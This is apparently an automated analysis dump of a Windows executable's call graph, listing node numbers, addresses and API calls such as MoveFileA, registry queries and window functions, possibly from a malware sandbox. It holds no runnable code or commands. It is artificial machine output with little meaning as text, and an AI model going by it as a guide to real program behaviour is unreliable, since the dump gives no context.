56182 49220c 56233 44734c 19 API calls 56182->56233 56184 492218 56185->56123 56187 452724 2 API calls 56186->56187 56189 452c99 56187->56189 56188 452c9d 56188->56141 56189->56188 56190 452cc1 MoveFileA GetLastError 56189->56190 56191 452760 Wow64RevertWow64FsRedirection 56190->56191 56192 452ce7 56191->56192 56192->56141 56193->56166 56195 406bbf 56194->56195 56196 406bd8 56195->56196 56198 406be1 56195->56198 56197 403400 4 API calls 56196->56197 56199 406bdf 56197->56199 56200 403778 18 API calls 56198->56200 56201 44734c 19 API calls 56199->56201 56200->56199 56201->56166 56202->56021 56203->56166 56204->56028 56205->56166 56206->56029 56207->56166 56208->56166 56209->56166 56210->56054 56211->56166 56212->56067 56213->56166 56214->56166 56215->56166 56216->56084 56217->56166 56218->56166 56219->56166 56220->56109 56221->56166 56222->56117 56223->56166 56224->56166 56225->56166 56226->56132 56227->56140 56228->56166 56229->56151 56230->56166 56231->56178 56232->56182 56233->56184 56234->56173 56235->56166 56236 40cc34 56239 406f10 WriteFile 56236->56239 56240 406f2d 56239->56240 50313 48095d 50318 451004 50313->50318 50315 480971 50328 47fa0c 50315->50328 50317 480995 50319 451011 50318->50319 50321 451065 50319->50321 50337 408c0c 18 API calls 50319->50337 50334 450e88 50321->50334 50325 45108d 50326 4510d0 50325->50326 50339 408c0c 18 API calls 50325->50339 50326->50315 50344 40b3c8 50328->50344 50330 47fa79 50330->50317 50333 47fa2e 50333->50330 50348 4069dc 50333->50348 50351 476994 50333->50351 50340 450e34 50334->50340 50337->50321 50338 408c0c 18 API calls 50338->50325 50339->50326 50341 450e46 50340->50341 50342 450e57 50340->50342 50343 450e4b InterlockedExchange 50341->50343 50342->50325 50342->50338 50343->50342 50345 40b3d3 50344->50345 50346 40b3f3 50345->50346 50367 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50345->50367 50346->50333 50349 402648 18 API calls 50348->50349 50350 4069e7 50349->50350 50350->50333 50362 4769c5 50351->50362 50365 476a0e 50351->50365 50352 476a59 50368 451294 50352->50368 50354 476a70 50356 403420 4 API calls 50354->50356 50358 476a8a 50356->50358 50357 4038a4 18 API calls 50357->50365 50358->50333 50361 403450 18 API calls 50361->50365 50364 451294 35 API calls 50362->50364 50362->50365 50374 4038a4 50362->50374 50383 403744 50362->50383 50387 403450 50362->50387 50363 403744 18 API calls 50363->50365 50364->50362 50365->50352 50365->50357 50365->50361 50365->50363 50366 451294 35 API calls 50365->50366 50366->50365 50367->50346 50369 4512af 50368->50369 50373 4512a4 50368->50373 50393 451238 35 API calls 50369->50393 50371 4512ba 50371->50373 50394 408c0c 18 API calls 50371->50394 50373->50354 50376 4038b1 50374->50376 50382 4038e1 50374->50382 50375 403400 4 API calls 50378 4038cb 50375->50378 50377 4038da 50376->50377 50379 4038bd 50376->50379 50380 4034bc 18 API calls 50377->50380 50378->50362 50395 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50379->50395 50380->50382 50382->50375 50384 40374a 50383->50384 50386 40375b 50383->50386 50385 4034bc 18 API calls 50384->50385 50384->50386 50385->50386 50386->50362 50388 403454 50387->50388 50389 403464 50387->50389 50388->50389 50391 4034bc 18 API calls 50388->50391 50390 403490 50389->50390 50392 402660 4 API calls 50389->50392 50390->50362 50391->50389 50392->50390 50393->50371 50394->50373 50395->50378 50396 41ee54 50397 41ee63 IsWindowVisible 50396->50397 50398 41ee99 50396->50398 50397->50398 50399 41ee6d IsWindowEnabled 50397->50399 50399->50398 50400 41ee77 50399->50400 50401 402648 18 API calls 50400->50401 50402 41ee81 EnableWindow 50401->50402 50402->50398 50403 46bb10 50404 46bb44 50403->50404 50435 46bfad 50403->50435 50408 46bbdc 50404->50408 50409 46bbba 50404->50409 50410 46bbcb 50404->50410 50411 46bb98 50404->50411 50412 46bba9 50404->50412 50421 46bb80 50404->50421 50405 403400 4 API calls 50407 46bfec 50405->50407 50416 403400 4 API calls 50407->50416 50726 46baa0 59 API calls 50408->50726 50459 46b6d0 50409->50459 50725 46b890 81 API calls 50410->50725 50723 46b420 61 API calls 50411->50723 50724 46b588 56 API calls 50412->50724 50420 46bff4 50416->50420 50419 46bb9e 50419->50421 50419->50435 50421->50435 50494 468c74 50421->50494 50422 46bc18 50422->50435 50438 46bc5b 50422->50438 50727 494da0 50422->50727 50425 46bd7e 50746 48358c 137 API calls 50425->50746 50426 414ae8 18 API calls 50426->50438 50429 46bd99 50429->50435 50430 42cbc0 20 API calls 50430->50438 50431 46af68 37 API calls 50431->50438 50433 403450 18 API calls 50433->50438 50435->50405 50436 46bdd7 50512 469f1c 50436->50512 50437 46af68 37 API calls 50437->50435 50438->50425 50438->50426 50438->50430 50438->50431 50438->50433 50438->50435 50438->50436 50455 46be9f 50438->50455 50497 468bb0 50438->50497 50505 46acd4 50438->50505 50650 483084 50438->50650 50763 46b1dc 33 API calls 50438->50763 50440 46be3d 50441 403450 18 API calls 50440->50441 50442 46be4d 50441->50442 50443 46bea9 50442->50443 50444 46be59 50442->50444 50449 46bf6b 50443->50449 50573 46af68 50443->50573 50747 457f1c 50444->50747 50448 457f1c 38 API calls 50448->50455 50455->50437 50764 46c424 50459->50764 50462 46b852 50464 403420 4 API calls 50462->50464 50466 46b86c 50464->50466 50465 46b71e 50467 46b83e 50465->50467 50771 455f84 27 API calls 50465->50771 50468 403400 4 API calls 50466->50468 50467->50462 50470 403450 18 API calls 50467->50470 50471 46b874 50468->50471 50470->50462 50472 403400 4 API calls 50471->50472 50473 46b87c 50472->50473 50473->50421 50474 46b801 50474->50462 50474->50467 50479 42cd48 21 API calls 50474->50479 50476 46b7a1 50476->50462 50476->50474 50781 42cd48 50476->50781 50478 46b73c 50478->50476 50772 466600 50478->50772 50481 46b817 50479->50481 50481->50467 50486 451458 18 API calls 50481->50486 50485 466600 33 API calls 50488 46b77c 50485->50488 50489 46b82e 50486->50489 50788 47efd0 56 API calls 50489->50788 50495 468bb0 33 API calls 50494->50495 50496 468c83 50495->50496 50496->50422 50498 468bdf 50497->50498 50499 4078f4 33 API calls 50498->50499 50502 468c20 50498->50502 50500 468c18 50499->50500 51041 453344 18 API calls 50500->51041 50503 403400 4 API calls 50502->50503 50504 468c38 50503->50504 50504->50438 50506 46ace5 50505->50506 50507 46ace0 50505->50507 51127 469a80 60 API calls 50506->51127 50509 46ace3 50507->50509 51042 46a740 50507->51042 50509->50438 50510 46aced 50510->50438 50513 403400 4 API calls 50512->50513 50514 469f4a 50513->50514 51504 47dd00 50514->51504 50516 469fad 50517 469fb1 50516->50517 50518 469fca 50516->50518 51511 466800 50517->51511 50520 469fbb 50518->50520 51514 494c90 18 API calls 50518->51514 50522 46a25e 50520->50522 50525 46a154 50520->50525 50526 46a0e9 50520->50526 50523 403420 4 API calls 50522->50523 50528 46a288 50523->50528 50524 469fe6 50524->50520 50529 469fee 50524->50529 50527 403494 4 API calls 50525->50527 50530 403494 4 API calls 50526->50530 50532 46a161 50527->50532 50528->50440 50533 46af68 37 API calls 50529->50533 50531 46a0f6 50530->50531 50534 40357c 18 API calls 50531->50534 50535 40357c 18 API calls 50532->50535 50542 469ffb 50533->50542 50536 46a103 50534->50536 50537 46a16e 50535->50537 50538 40357c 18 API calls 50536->50538 50539 40357c 18 API calls 50537->50539 50540 46a110 50538->50540 50541 46a17b 50539->50541 50543 40357c 18 API calls 50540->50543 50544 40357c 18 API calls 50541->50544 50547 46a024 SetActiveWindow 50542->50547 50548 46a03c 50542->50548 50545 46a11d 50543->50545 50546 46a188 50544->50546 50549 466800 34 API calls 50545->50549 50550 40357c 18 API calls 50546->50550 50547->50548 51515 42f560 50548->51515 50551 46a12b 50549->50551 50552 46a196 50550->50552 50554 40357c 18 API calls 50551->50554 50555 414b18 18 API calls 50552->50555 50557 46a134 50554->50557 50558 46a152 50555->50558 50560 40357c 18 API calls 50557->50560 51532 466b38 50558->51532 50563 46a141 50560->50563 50562 46a08d 50565 46ade4 35 API calls 50562->50565 50564 414b18 18 API calls 50563->50564 50564->50558 50566 46a0bf 50565->50566 50566->50440 50574 468c74 33 API calls 50573->50574 50575 46af80 50574->50575 50576 46afa2 50575->50576 50577 4652cc 21 API calls 50575->50577 51728 4652cc 50576->51728 50577->50576 50581 46afba 50582 46ade4 35 API calls 50581->50582 50583 46aff2 50582->50583 50584 414b18 18 API calls 50583->50584 50585 46b006 50584->50585 50586 46b012 50585->50586 50587 46b03c 50585->50587 50588 414b18 18 API calls 50586->50588 50590 46b05b 50587->50590 50591 46b085 50587->50591 50589 46b026 50588->50589 50592 414b18 18 API calls 50589->50592 50593 414b18 18 API calls 50590->50593 50594 414b18 18 API calls 50591->50594 50596 46b03a 50592->50596 50597 46b06f 50593->50597 50595 46b099 50594->50595 50598 414b18 18 API calls 50595->50598 51745 46acfc 50596->51745 50599 414b18 18 API calls 50597->50599 50598->50596 50599->50596 50651 46c424 62 API calls 50650->50651 50652 4830c7 50651->50652 50653 4830d0 50652->50653 52015 408be0 19 API calls 50652->52015 50655 414ae8 18 API calls 50653->50655 50656 4830e0 50655->50656 50657 403450 18 API calls 50656->50657 50658 4830ed 50657->50658 51817 46c77c 50658->51817 50661 4830fd 50663 414ae8 18 API calls 50661->50663 50664 48310d 50663->50664 50665 403450 18 API calls 50664->50665 50666 48311a 50665->50666 50667 469868 SendMessageA 50666->50667 50668 483133 50667->50668 50669 483184 50668->50669 52017 479e18 37 API calls 50668->52017 51846 4241dc IsIconic 50669->51846 50673 48319f SetActiveWindow 50674 4831b4 50673->50674 51854 4824b4 50674->51854 50723->50419 50724->50421 50725->50421 50726->50421 53670 43d9c8 50727->53670 50730 494dcc 53675 431bd0 50730->53675 50731 494e52 50732 494e61 50731->50732 53708 4945c8 18 API calls 50731->53708 50732->50438 50741 494e16 53706 49465c 18 API calls 50741->53706 50743 494e2a 53707 433dd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50743->53707 50745 494e4a 50745->50438 50746->50429 50748 457f41 50747->50748 50749 457f61 50748->50749 50750 4078f4 33 API calls 50748->50750 50751 403400 4 API calls 50749->50751 50752 457f59 50750->50752 50753 457f76 50751->50753 50754 457d10 38 API calls 50752->50754 50753->50448 50754->50749 50763->50438 50789 46c4bc 50764->50789 50767 414ae8 50768 414af6 50767->50768 50769 4034e0 18 API calls 50768->50769 50770 414b03 50769->50770 50770->50465 50771->50478 50773 46661a 50772->50773 50992 4078f4 50773->50992 51035 42cccc 50781->51035 50784 451458 50785 451428 18 API calls 50784->50785 50786 451474 50785->50786 50787 47efd0 56 API calls 50786->50787 50787->50474 50788->50467 50790 414ae8 18 API calls 50789->50790 50791 46c4f0 50790->50791 50850 466898 50791->50850 50795 46c502 50796 46c511 50795->50796 50799 46c52a 50795->50799 50919 47efd0 56 API calls 50796->50919 50798 403420 4 API calls 50801 46b702 50798->50801 50800 46c571 50799->50800 50802 46c558 50799->50802 50803 46c5d6 50800->50803 50808 46c575 50800->50808 50801->50462 50801->50767 50920 47efd0 56 API calls 50802->50920 50922 42cb4c CharNextA 50803->50922 50806 46c5e5 50807 46c5e9 50806->50807 50812 46c602 50806->50812 50923 47efd0 56 API calls 50807->50923 50810 46c5bd 50808->50810 50808->50812 50921 47efd0 56 API calls 50810->50921 50811 46c626 50924 47efd0 56 API calls 50811->50924 50812->50811 50864 466a08 50812->50864 50817 46c525 50817->50798 50820 46c63f 50872 403778 50820->50872 50825 46c666 50925 466a94 18 API calls 50825->50925 50826 46c697 50883 42c8cc 50826->50883 50829 46c679 50831 451458 18 API calls 50829->50831 50833 46c686 50831->50833 50926 47efd0 56 API calls 50833->50926 50855 4668b2 50850->50855 50851 406bb0 18 API calls 50851->50855 50853 42cbc0 20 API calls 50853->50855 50854 403450 18 API calls 50854->50855 50855->50851 50855->50853 50855->50854 50856 4668fb 50855->50856 50929 42caac 50855->50929 50857 403420 4 API calls 50856->50857 50858 466915 50857->50858 50859 414b18 50858->50859 50860 414ae8 18 API calls 50859->50860 50861 414b3c 50860->50861 50862 403400 4 API calls 50861->50862 50863 414b6d 50862->50863 50863->50795 50865 466a12 50864->50865 50866 466a25 50865->50866 50945 42cb3c CharNextA 50865->50945 50866->50811 50868 466a38 50866->50868 50869 466a42 50868->50869 50870 466a6f 50869->50870 50946 42cb3c CharNextA 50869->50946 50870->50811 50870->50820 50873 4037aa 50872->50873 50874 40377d 50872->50874 50875 403400 4 API calls 50873->50875 50874->50873 50876 403791 50874->50876 50878 4037a0 50875->50878 50877 4034e0 18 API calls 50876->50877 50877->50878 50879 42c99c 50878->50879 50880 42c9b2 50879->50880 50881 42c9f5 50879->50881 50880->50881 50947 42cb3c CharNextA 50880->50947 50881->50825 50881->50826 50948 42c674 50883->50948 50919->50817 50920->50817 50921->50817 50922->50806 50923->50817 50924->50817 50925->50829 50926->50817 50930 403494 4 API calls 50929->50930 50931 42cabc 50930->50931 50932 403744 18 API calls 50931->50932 50936 42caf2 50931->50936 50938 42c444 IsDBCSLeadByte 50931->50938 50932->50931 50934 42cb36 50934->50855 50936->50934 50939 4037b8 50936->50939 50944 42c444 IsDBCSLeadByte 50936->50944 50938->50931 50940 403744 18 API calls 50939->50940 50942 4037c6 50940->50942 50941 4037fc 50941->50936 50942->50941 50943 4038a4 18 API calls 50942->50943 50943->50941 50944->50936 50945->50865 50946->50869 50947->50880 50951 42c67c 50948->50951 50950 42c67b 50954 42c68d 50951->50954 50952 42c6f1 50955 42c6ec 50952->50955 50959 42c444 IsDBCSLeadByte 50952->50959 50954->50952 50957 42c6ab 50954->50957 50955->50950 50957->50955 50958 42c444 IsDBCSLeadByte 50957->50958 50958->50957 50959->50955 50995 407908 50992->50995 50996 407925 50995->50996 51003 4075b8 50996->51003 50999 407951 51001 4034e0 18 API calls 50999->51001 51002 407903 51001->51002 51002->50485 51006 4075d3 51003->51006 51004 4075e5 51004->50999 51008 4069a0 19 API calls 51004->51008 51006->51004 51009 4076da 33 API calls 51006->51009 51010 4075ac LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51006->51010 51008->50999 51009->51006 51010->51006 51036 42cbc0 20 API calls 51035->51036 51037 42ccee 51036->51037 51038 42ccf6 GetFileAttributesA 51037->51038 51039 403400 4 API calls 51038->51039 51040 42cd13 51039->51040 51040->50474 51040->50784 51041->50502 51044 46a787 51042->51044 51043 46abff 51046 46ac1a 51043->51046 51047 46ac4b 51043->51047 51044->51043 51045 46a842 51044->51045 51048 403494 4 API calls 51044->51048 51051 46a863 51045->51051 51052 46a8a4 51045->51052 51049 403494 4 API calls 51046->51049 51050 403494 4 API calls 51047->51050 51054 46a7c6 51048->51054 51055 46ac28 51049->51055 51056 46ac59 51050->51056 51053 403494 4 API calls 51051->51053 51060 403400 4 API calls 51052->51060 51057 46a871 51053->51057 51058 414ae8 18 API calls 51054->51058 51154 46915c 26 API calls 51055->51154 51155 46915c 26 API calls 51056->51155 51062 414ae8 18 API calls 51057->51062 51063 46a7e7 51058->51063 51064 46a8a2 51060->51064 51066 46a892 51062->51066 51128 403634 51063->51128 51084 46a988 51064->51084 51134 469868 51064->51134 51065 46ac36 51068 403400 4 API calls 51065->51068 51069 403634 18 API calls 51066->51069 51072 46ac7c 51068->51072 51069->51064 51077 403400 4 API calls 51072->51077 51073 46aa10 51075 403400 4 API calls 51073->51075 51080 46aa0e 51075->51080 51076 46a8c4 51081 46a902 51076->51081 51082 46a8ca 51076->51082 51078 46ac84 51077->51078 51083 403420 4 API calls 51078->51083 51149 469ca4 57 API calls 51080->51149 51085 403400 4 API calls 51081->51085 51086 403494 4 API calls 51082->51086 51088 46ac91 51083->51088 51084->51073 51089 46a9cf 51084->51089 51090 46a900 51085->51090 51087 46a8d8 51086->51087 51140 47c26c 51087->51140 51088->50509 51094 403494 4 API calls 51089->51094 51143 469b5c 51090->51143 51098 46a9dd 51094->51098 51096 46aa39 51104 46aa44 51096->51104 51105 46aa9a 51096->51105 51097 46a8f0 51100 403634 18 API calls 51097->51100 51101 414ae8 18 API calls 51098->51101 51100->51090 51103 46a9fe 51101->51103 51106 403634 18 API calls 51103->51106 51108 403494 4 API calls 51104->51108 51107 403400 4 API calls 51105->51107 51106->51080 51114 46aaa2 51107->51114 51116 46aa52 51108->51116 51109 46a929 51110 46a934 51109->51110 51111 46a98a 51109->51111 51113 403494 4 API calls 51110->51113 51112 403400 4 API calls 51111->51112 51112->51084 51118 46a942 51113->51118 51126 46ab4b 51114->51126 51150 494c90 18 API calls 51114->51150 51116->51114 51120 403634 18 API calls 51116->51120 51122 46aa98 51116->51122 51117 46aac5 51117->51126 51151 494f3c 32 API calls 51117->51151 51118->51084 51121 403634 18 API calls 51118->51121 51120->51116 51121->51118 51122->51114 51124 46abec 51153 429144 SendMessageA SendMessageA 51124->51153 51152 4290f4 SendMessageA 51126->51152 51127->50510 51129 40363c 51128->51129 51130 4034bc 18 API calls 51129->51130 51131 40364f 51130->51131 51132 403450 18 API calls 51131->51132 51133 403677 51132->51133 51156 42a040 SendMessageA 51134->51156 51136 469877 51137 469897 51136->51137 51157 42a040 SendMessageA 51136->51157 51137->51076 51139 469887 51139->51076 51158 47c2b4 51140->51158 51147 469b89 51143->51147 51144 469beb 51145 403400 4 API calls 51144->51145 51146 469c00 51145->51146 51146->51109 51147->51144 51503 469ae0 57 API calls 51147->51503 51149->51096 51150->51117 51151->51126 51152->51124 51153->51043 51154->51065 51155->51065 51156->51136 51157->51139 51159 403494 4 API calls 51158->51159 51166 47c2e7 51159->51166 51160 47c3f9 51161 403420 4 API calls 51160->51161 51162 47c289 51161->51162 51162->51097 51164 403778 18 API calls 51164->51166 51166->51160 51166->51164 51169 4037b8 18 API calls 51166->51169 51170 47b100 51166->51170 51414 453344 18 API calls 51166->51414 51415 403800 51166->51415 51419 42c97c CharPrevA 51166->51419 51169->51166 51171 47b152 51170->51171 51172 47b130 51170->51172 51173 47b172 51171->51173 51174 47b160 51171->51174 51172->51171 51424 47a030 33 API calls 51172->51424 51177 47b1d5 51173->51177 51178 47b180 51173->51178 51175 403494 4 API calls 51174->51175 51229 47b16d 51175->51229 51187 47b1f6 51177->51187 51188 47b1e3 51177->51188 51180 47b1af 51178->51180 51181 47b189 51178->51181 51179 403400 4 API calls 51182 47baf8 51179->51182 51184 47b1c2 51180->51184 51426 453344 18 API calls 51180->51426 51183 47b19c 51181->51183 51425 453344 18 API calls 51181->51425 51186 403400 4 API calls 51182->51186 51190 403494 4 API calls 51183->51190 51185 403494 4 API calls 51184->51185 51185->51229 51192 47bb00 51186->51192 51194 47b217 51187->51194 51195 47b204 51187->51195 51193 403494 4 API calls 51188->51193 51190->51229 51192->51166 51193->51229 51197 47b267 51194->51197 51198 47b225 51194->51198 51196 403494 4 API calls 51195->51196 51196->51229 51205 47b275 51197->51205 51206 47b288 51197->51206 51199 47b241 51198->51199 51200 47b22e 51198->51200 51202 47b254 51199->51202 51427 453344 18 API calls 51199->51427 51201 403494 4 API calls 51200->51201 51201->51229 51204 403494 4 API calls 51202->51204 51204->51229 51207 403494 4 API calls 51205->51207 51208 47b296 51206->51208 51209 47b2a9 51206->51209 51207->51229 51210 403494 4 API calls 51208->51210 51211 47b2b7 51209->51211 51212 47b2ca 51209->51212 51210->51229 51213 403494 4 API calls 51211->51213 51214 47b2eb 51212->51214 51215 47b2d8 51212->51215 51213->51229 51217 47b327 51214->51217 51218 47b2f9 51214->51218 51216 403494 4 API calls 51215->51216 51216->51229 51223 47b335 51217->51223 51228 47b364 51217->51228 51219 47b315 51218->51219 51220 47b302 51218->51220 51222 47c26c 57 API calls 51219->51222 51221 403494 4 API calls 51220->51221 51221->51229 51222->51229 51224 47b351 51223->51224 51225 47b33e 51223->51225 51227 403494 4 API calls 51224->51227 51226 403494 4 API calls 51225->51226 51226->51229 51227->51229 51230 47b372 51228->51230 51231 47b3a0 51228->51231 51229->51179 51232 47b38e 51230->51232 51233 47b37b 51230->51233 51236 47b3ae 51231->51236 51237 47b3dd 51231->51237 51235 47c26c 57 API calls 51232->51235 51234 403494 4 API calls 51233->51234 51234->51229 51235->51229 51238 47b3b7 51236->51238 51239 47b3ca 51236->51239 51242 47b3fe 51237->51242 51243 47b3eb 51237->51243 51414->51166 51416 40382f 51415->51416 51417 403804 51415->51417 51416->51166 51418 4038a4 18 API calls 51417->51418 51418->51416 51419->51166 51424->51172 51425->51183 51426->51184 51427->51202 51503->51147 51505 47dd56 51504->51505 51506 47dd19 51504->51506 51505->50516 51536 455d0c 51506->51536 51510 47dd6d 51510->50516 51655 466714 51511->51655 51514->50524 51516 42f56c 51515->51516 51517 42f58f GetActiveWindow GetFocus 51516->51517 51518 41eea4 2 API calls 51517->51518 51519 42f5a6 51518->51519 51520 42f5c3 51519->51520 51521 42f5b3 RegisterClassA 51519->51521 51522 42f652 SetFocus 51520->51522 51523 42f5d1 CreateWindowExA 51520->51523 51521->51520 51524 403400 4 API calls 51522->51524 51523->51522 51525 42f604 51523->51525 51526 42f66e 51524->51526 51686 42427c 51525->51686 51531 494f3c 32 API calls 51526->51531 51528 42f62c 51529 42f634 CreateWindowExA 51528->51529 51529->51522 51530 42f64a ShowWindow 51529->51530 51530->51522 51531->50562 51692 44b514 51532->51692 51537 455d1d 51536->51537 51538 455d21 51537->51538 51539 455d2a 51537->51539 51562 455a10 51538->51562 51570 455af0 43 API calls 51539->51570 51542 455d27 51542->51505 51543 47d970 51542->51543 51548 47da6c 51543->51548 51550 47d9b0 51543->51550 51544 403420 4 API calls 51545 47db4f 51544->51545 51545->51510 51555 47dabd 51548->51555 51558 47da0f 51548->51558 51625 479630 51548->51625 51550->51548 51551 47da18 51550->51551 51554 47c26c 57 API calls 51550->51554 51550->51558 51599 479770 51550->51599 51610 4798d4 51550->51610 51551->51550 51556 47c26c 57 API calls 51551->51556 51561 47da59 51551->51561 51614 42c92c 51551->51614 51619 42c954 51551->51619 51624 47d67c 66 API calls 51551->51624 51552 47c26c 57 API calls 51552->51555 51553 454100 34 API calls 51553->51555 51554->51550 51555->51548 51555->51552 51555->51553 51555->51561 51556->51551 51558->51544 51561->51558 51571 42de1c 51562->51571 51564 455a2d 51565 455a7b 51564->51565 51574 455944 51564->51574 51565->51542 51568 455944 20 API calls 51569 455a5c RegCloseKey 51568->51569 51569->51542 51570->51542 51572 42de27 51571->51572 51573 42de2d RegOpenKeyExA 51571->51573 51572->51573 51573->51564 51579 42dd58 51574->51579 51576 403420 4 API calls 51577 4559f6 51576->51577 51577->51568 51578 45596c 51578->51576 51582 42dc00 51579->51582 51583 42dc26 RegQueryValueExA 51582->51583 51588 42dc49 51583->51588 51598 42dc6b 51583->51598 51584 403400 4 API calls 51586 42dd37 51584->51586 51585 42dc63 51587 403400 4 API calls 51585->51587 51586->51578 51587->51598 51588->51585 51589 4034e0 18 API calls 51588->51589 51590 403744 18 API calls 51588->51590 51588->51598 51589->51588 51591 42dca0 RegQueryValueExA 51590->51591 51591->51583 51592 42dcbc 51591->51592 51593 4038a4 18 API calls 51592->51593 51592->51598 51594 42dcfe 51593->51594 51595 42dd10 51594->51595 51597 403744 18 API calls 51594->51597 51596 403450 18 API calls 51595->51596 51596->51598 51597->51595 51598->51584 51600 479786 51599->51600 51601 479782 51599->51601 51602 403450 18 API calls 51600->51602 51601->51550 51603 479793 51602->51603 51604 4797b3 51603->51604 51605 479799 51603->51605 51607 479630 33 API calls 51604->51607 51606 479630 33 API calls 51605->51606 51608 4797af 51606->51608 51607->51608 51609 403400 4 API calls 51608->51609 51609->51601 51611 4798e0 51610->51611 51612 4798fb 51611->51612 51637 453344 18 API calls 51611->51637 51612->51550 51638 42c79c 51614->51638 51617 403778 18 API calls 51618 42c94e 51617->51618 51618->51551 51620 42c79c IsDBCSLeadByte 51619->51620 51621 42c964 51620->51621 51622 403778 18 API calls 51621->51622 51623 42c975 51622->51623 51623->51551 51624->51551 51626 47964b 51625->51626 51629 47967c 51626->51629 51636 47970a 51626->51636 51650 4794e4 33 API calls 51626->51650 51627 4796a1 51632 4796c2 51627->51632 51652 4794e4 33 API calls 51627->51652 51629->51627 51651 4794e4 33 API calls 51629->51651 51633 479702 51632->51633 51632->51636 51653 453344 18 API calls 51632->51653 51644 479368 51633->51644 51636->51548 51637->51612 51639 42c67c IsDBCSLeadByte 51638->51639 51641 42c7b1 51639->51641 51640 42c7fb 51640->51617 51641->51640 51643 42c444 IsDBCSLeadByte 51641->51643 51643->51641 51645 4793a3 51644->51645 51646 403450 18 API calls 51645->51646 51647 4793c8 51646->51647 51654 477a58 33 API calls 51647->51654 51649 479409 51649->51636 51650->51629 51651->51627 51652->51632 51653->51633 51654->51649 51656 403494 4 API calls 51655->51656 51657 466742 51656->51657 51672 42dbc8 51657->51672 51660 42dbc8 19 API calls 51661 466766 51660->51661 51662 466600 33 API calls 51661->51662 51663 466770 51662->51663 51664 42dbc8 19 API calls 51663->51664 51665 46677f 51664->51665 51675 466678 51665->51675 51668 42dbc8 19 API calls 51669 466798 51668->51669 51670 403400 4 API calls 51669->51670 51671 4667ad 51670->51671 51671->50520 51679 42db10 51672->51679 51676 466698 51675->51676 51677 4078f4 33 API calls 51676->51677 51678 4666e2 51677->51678 51678->51668 51680 42db30 51679->51680 51681 42dbbb 51679->51681 51680->51681 51682 4037b8 18 API calls 51680->51682 51684 403800 18 API calls 51680->51684 51685 42c444 IsDBCSLeadByte 51680->51685 51681->51660 51682->51680 51684->51680 51685->51680 51687 4242ae 51686->51687 51688 42428e GetWindowTextA 51686->51688 51690 403494 4 API calls 51687->51690 51689 4034e0 18 API calls 51688->51689 51691 4242ac 51689->51691 51690->51691 51691->51528 51695 44b38c 51692->51695 51696 44b3bf 51695->51696 51697 414ae8 18 API calls 51696->51697 51698 44b3d2 51697->51698 51699 44b3ff GetDC 51698->51699 51700 40357c 18 API calls 51698->51700 51706 41a1e8 51699->51706 51700->51699 51703 44b430 51714 44b0c0 51703->51714 51707 41a213 51706->51707 51708 41a2af 51706->51708 51725 403520 51707->51725 51709 403400 4 API calls 51708->51709 51710 41a2c7 SelectObject 51709->51710 51710->51703 51712 41a26b 51713 41a2a3 CreateFontIndirectA 51712->51713 51713->51708 51715 44b0d7 51714->51715 51726 4034e0 18 API calls 51725->51726 51727 40352a 51726->51727 51727->51712 51731 4652d7 51728->51731 51729 4653b2 51739 46708c 51729->51739 51730 46536a 51730->51729 51757 4185b8 21 API calls 51730->51757 51731->51729 51734 465327 51731->51734 51751 421a1c 51731->51751 51734->51730 51735 465361 51734->51735 51736 46536c 51734->51736 51737 421a1c 21 API calls 51735->51737 51738 421a1c 21 API calls 51736->51738 51737->51730 51738->51730 51740 4670bc 51739->51740 51741 46709d 51739->51741 51740->50581 51742 414b18 18 API calls 51741->51742 51743 4670ab 51742->51743 51744 414b18 18 API calls 51743->51744 51744->51740 51752 421a74 51751->51752 51754 421a2a 51751->51754 51752->51734 51753 421a59 51753->51752 51766 421d28 SetFocus GetFocus 51753->51766 51754->51753 51758 408cbc 51754->51758 51757->51729 51759 408cc8 51758->51759 51767 406dec LoadStringA 51759->51767 51762 403450 18 API calls 51763 408cf9 51762->51763 51764 403400 4 API calls 51763->51764 51765 408d0e 51764->51765 51765->51753 51766->51752 51768 4034e0 18 API calls 51767->51768 51769 406e19 51768->51769 51769->51762 51818 46c7a5 51817->51818 51819 414ae8 18 API calls 51818->51819 51834 46c7f2 51818->51834 51820 46c7bb 51819->51820 52024 466924 20 API calls 51820->52024 51821 403420 4 API calls 51823 46c89c 51821->51823 51823->50661 52016 408be0 19 API calls 51823->52016 51824 46c7c3 51825 414b18 18 API calls 51824->51825 51826 46c7d1 51825->51826 51827 46c7de 51826->51827 51829 46c7f7 51826->51829 52025 47efd0 56 API calls 51827->52025 51830 46c80f 51829->51830 51832 466a08 CharNextA 51829->51832 52026 47efd0 56 API calls 51830->52026 51833 46c80b 51832->51833 51833->51830 51835 46c825 51833->51835 51834->51821 51836 46c841 51835->51836 51837 46c82b 51835->51837 51839 42c99c CharNextA 51836->51839 52027 47efd0 56 API calls 51837->52027 51840 46c84e 51839->51840 51840->51834 52028 466a94 18 API calls 51840->52028 51842 46c865 51843 451458 18 API calls 51842->51843 51844 46c872 51843->51844 52029 47efd0 56 API calls 51844->52029 51847 4241ed SetActiveWindow 51846->51847 51851 424223 51846->51851 52030 42364c 51847->52030 51851->50673 51851->50674 51852 42420a 51852->51851 51853 42421d SetFocus 51852->51853 51853->51851 51855 482505 51854->51855 51856 4824d7 51854->51856 51858 475bd0 51855->51858 52043 494cec 32 API calls 51856->52043 52044 457d10 51858->52044 51862 475c26 52017->50669 52024->51824 52025->51834 52026->51834 52027->51834 52028->51842 52029->51834 52039 4235f8 SystemParametersInfoA 52030->52039 52033 423665 ShowWindow 52035 423670 52033->52035 52036 423677 52033->52036 52042 423628 SystemParametersInfoA 52035->52042 52038 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 52036->52038 52038->51852 52040 423616 52039->52040 52040->52033 52041 423628 SystemParametersInfoA 52040->52041 52041->52033 52042->52036 52043->51855 52045 457e44 52044->52045 52046 457d3c 52044->52046 52047 457e95 52045->52047 52520 45757c 20 API calls 52045->52520 52516 457a0c GetSystemTimeAsFileTime FileTimeToSystemTime 52046->52516 52050 403400 4 API calls 52047->52050 52052 457eaa 52050->52052 52051 457d44 52053 4078f4 33 API calls 52051->52053 52065 4072a8 52052->52065 52054 457db5 52053->52054 52517 457d00 34 API calls 52054->52517 52056 403778 18 API calls 52060 457dbd 52056->52060 52057 457e0b 52060->52056 52060->52057 52061 457d00 34 API calls 52060->52061 52061->52060 52066 403738 52065->52066 52067 4072b2 SetCurrentDirectoryA 52066->52067 52067->51862 52516->52051 52517->52060 52520->52047 53709 431eec 53670->53709 53672 43d9f2 53673 403400 4 API calls 53672->53673 53674 43da76 53673->53674 